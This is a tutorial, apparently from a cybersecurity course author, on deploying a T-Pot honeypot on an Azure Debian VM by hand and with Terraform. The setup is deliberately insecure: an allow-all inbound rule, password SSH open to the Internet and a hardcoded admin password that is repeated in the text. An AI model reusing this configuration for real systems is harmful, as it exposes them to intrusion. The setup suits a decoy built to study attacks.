30m Azure Honeypot Project
A honeypot is a fake computer system or network that looks real but isn’t actually used for any important work. It’s designed to attract hackers who are up to no good.
Just like a bee is drawn to honey, hackers are drawn to these honeypots because they seem like easy targets. Once they try to break in, cybersecurity experts can watch what the hackers are doing.
Think of it as a decoy house in a neighborhood. Burglars might try to break in, thinking it’s an easy target, but instead, they get caught in the act!
Most all of the activity you’ll see in the honeypot is automated bots, billions of them, scanning the internet nonstop looking for vulnerable hosts. It doesn’t take 5 seconds after your host is deployed on the internet to start seeing voracious attacks in every direction.
That is what we’re doing here, we’re going to create a Debian VM on Azure, install T-pot, and open up the gates to let anyone and anything in to contact it. Then I’m going to let you poke around and toy with all the features of T-pot.
Creating a Virtual Machine
The first thing you’re going to do is go to the Azure Portal and sign up for an account if you already don’t have one. Once you do, you will get $200 free credits added to your account. That will more than cover the charges of this lab.
Once you have created an account, at the top search bar type in “Virutal Machine” and you will be brought to the screen in Figure 1–1. Click the button to create a new virtual machine.
Then create a new resource group and name it “tpot-rg” as shown in Figure 1–2.
A resource is the individual service that you will be consuming, and a resource group is a group of these resources together.
This project will have a few resources like the Virtual Machine, Public IP address, Network Security Group,… etc that will be inside of this resource group. When you are finish with the lab all that you need to do is delete the resource group to delete this entire project.
- Name the virtual machine, “tpot-vm”
- Set the region to the region closest to you
- Set the security type to “standard”
- Click see all images and select “Debian 11 “Bullseye” — x64 Gen 2
- Choose size “Standard_B4ms — 4 vcpus, 16 GiB memory”
- Select password authentication type
- Choose username ‘azureuser’ and type a password
- Click “Next: Disks”
- Change the disk size to 128GiB
- Click Next
- Check the box to delete public IP and NIC when VM is deleted
- Click “Next: Management”
- Click “Review + create” at the top
- Click “Create” to create your new VM
- Wait for your VM deployment to finish
Open Traffic Flow
Now we need to open up the gates and create a rule to allow all communication in to the honeypot. This will allow the adversaries to be able to attack the honeypot so you can collect the data.
- At the top search bar, type in “tpot-vm-nsg” and select the network security group resource
- Select “Inbound security rules” on the left
- Click “Add”
- Change Destination port ranges to start “*”
- Change Priority to “100”
- Change Name to “DANGER_ALLOW_ALL”
- Click “Add”
This rule on the Network Security Group applies to all resources in the network security group and allows ALL traffic on ALL ports inside. This is not recommended anywhere at anytime except right now.
Configuring the honeypot
Now we need to go grab the public IP address for the VM, as its time to log into the VM.
- Type in “tpot-vm” in the search bar at the top and select the resource
Copy the Public IP address to the clipboard
Windows now has the ability to SSH from the command prompt in Win 10 and Win 11, Mac and Linux also allows SSH from the terminal. Go ahead and SSH into the host:
ssh azureuser@<public ip address>
- Execute these commands
sudo apt update
sudo apt upgrade -y
sudo apt install git
sudo git clone https://github.com/telekom-security/tpotce
cd tpotce/iso/installer/
sudo ./install.sh --type=user
- Select “Standard”
- Create user “azureuser” and select the same password you used before
You can open the T-Pot Landing Page from your browser via:
https://<your VM's public IP address>:64297
NOW! Delete everything, and deploy it with Terraform. I’ve created this Terraform to show you exactly how much easier it is. In this course you’ve setup Azure with Terraform.
If you don’t remember, create a new directory called “tfpot” and change directory to it. While inside create a new file and paste this code into a new file called “tfpot.tf”.
terraform {
required_providers {
azurerm = {
source = "hashicorp/azurerm"
version = "3.90.0"
}
}
}
provider "azurerm" {
# Configuration options
features {
}
}
variable "prefix" {
default = "tpot"
}
resource "azurerm_resource_group" "tpot-rg" {
name = "${var.prefix}-resources"
location = "East US"
}
resource "azurerm_virtual_network" "main" {
name = "${var.prefix}-network"
address_space = ["10.0.0.0/16"]
location = azurerm_resource_group.tpot-rg.location
resource_group_name = azurerm_resource_group.tpot-rg.name
}
resource "azurerm_subnet" "internal" {
name = "internal"
resource_group_name = azurerm_resource_group.tpot-rg.name
virtual_network_name = azurerm_virtual_network.main.name
address_prefixes = ["10.0.2.0/24"]
}
resource "azurerm_virtual_machine" "main" {
depends_on = [ azurerm_resource_group.tpot-rg ]
name = "${var.prefix}-vm"
location = azurerm_resource_group.tpot-rg.location
resource_group_name = azurerm_resource_group.tpot-rg.name
network_interface_ids = [azurerm_network_interface.tpot-vm-nic.id]
vm_size = "Standard_B4ms"
# Uncomment this line to delete the OS disk automatically when deleting the VM
delete_os_disk_on_termination = true
# Uncomment this line to delete the data disks automatically when deleting the VM
delete_data_disks_on_termination = true
storage_image_reference {
publisher = "debian"
offer = "debian-11"
sku = "11"
version = "latest"
}
storage_os_disk {
name = "tpot-disk"
caching = "ReadWrite"
create_option = "FromImage"
managed_disk_type = "Standard_LRS"
}
os_profile {
computer_name = "hostname"
admin_username = "azureuser"
admin_password = "CloudSecurityNOW!"
}
os_profile_linux_config {
disable_password_authentication = false
}
}
# Create Security Group to access linux
resource "azurerm_network_security_group" "tpot-nsg" {
depends_on=[azurerm_resource_group.tpot-rg]
name = "linux-vm-nsg"
location = azurerm_resource_group.tpot-rg.location
resource_group_name = azurerm_resource_group.tpot-rg.name
security_rule {
name = "AllowALL"
description = "AllowALL"
priority = 100
direction = "Inbound"
access = "Allow"
protocol = "Tcp"
source_port_range = "*"
destination_port_range = "*"
source_address_prefix = "Internet"
destination_address_prefix = "*"
}
security_rule {
name = "AllowSSH"
description = "Allow SSH"
priority = 150
direction = "Inbound"
access = "Allow"
protocol = "Tcp"
source_port_range = "*"
destination_port_range = "22"
source_address_prefix = "Internet"
destination_address_prefix = "*"
}
}
# Associate the linux NSG with the subnet
resource "azurerm_subnet_network_security_group_association" "tpot-vm-nsg-association" {
depends_on=[azurerm_resource_group.tpot-rg]
subnet_id = azurerm_subnet.internal.id
network_security_group_id = azurerm_network_security_group.tpot-nsg.id
}
# Get a Static Public IP
resource "azurerm_public_ip" "tpot-vm-ip" {
depends_on=[azurerm_resource_group.tpot-rg]
name = "tpot-vm-ip"
location = azurerm_resource_group.tpot-rg.location
resource_group_name = azurerm_resource_group.tpot-rg.name
allocation_method = "Static"
}
# Create Network Card for linux VM
resource "azurerm_network_interface" "tpot-vm-nic" {
depends_on=[azurerm_resource_group.tpot-rg]
name = "tpot-vm-nic"
location = azurerm_resource_group.tpot-rg.location
resource_group_name = azurerm_resource_group.tpot-rg.name
ip_configuration {
name = "internal"
subnet_id = azurerm_subnet.internal.id
private_ip_address_allocation = "Dynamic"
public_ip_address_id = azurerm_public_ip.tpot-vm-ip.id
}
}
output "public_ip" {
value = azurerm_public_ip.tpot-vm-ip.ip_address
}
Type az login to establish your credentials
az login
Initialize the directory
terraform init
Now terraform plan
terraform plan
Now terraform apply
terraform apply
It will output the public IP address. Just SSH into it with the credentials:
Username: azureuser
Password: CloudSecurityNOW!
And install the honeypot
sudo apt update
sudo apt upgrade -y
sudo apt install git
sudo git clone https://github.com/telekom-security/tpotce
cd tpotce/iso/installer/
sudo ./install.sh --type=user
Have fun! When you are finished, make sure you “terraform destroy” and delete the resource group from the manual install in Azure.
More articles in this series
Tyler Wall is the founder of Cyber NOW Education by night and works full time in the cybersecurity industry as his day job. He creates cybersecurity training material in his free time, often after feeling the need to shout what he’s just learned and also because a little bit of passive income never hurt anyone.
He holds bills for a Master of Science from Purdue University, and also CISSP, CCSK, CFSR, CEH, Sec+, Net+, A+ certifications
You can connect with him on LinkedIn.
Get 20% off all courses in our On-Demand catalog with coupon code “MEDIUMFRIENDS”
For a limited of time get a free copy of Jump-start Your SOC Analyst Career eBook that was published June 1, 2024, in exchange for a review on Amazon. Email tyler@cybernoweducation.com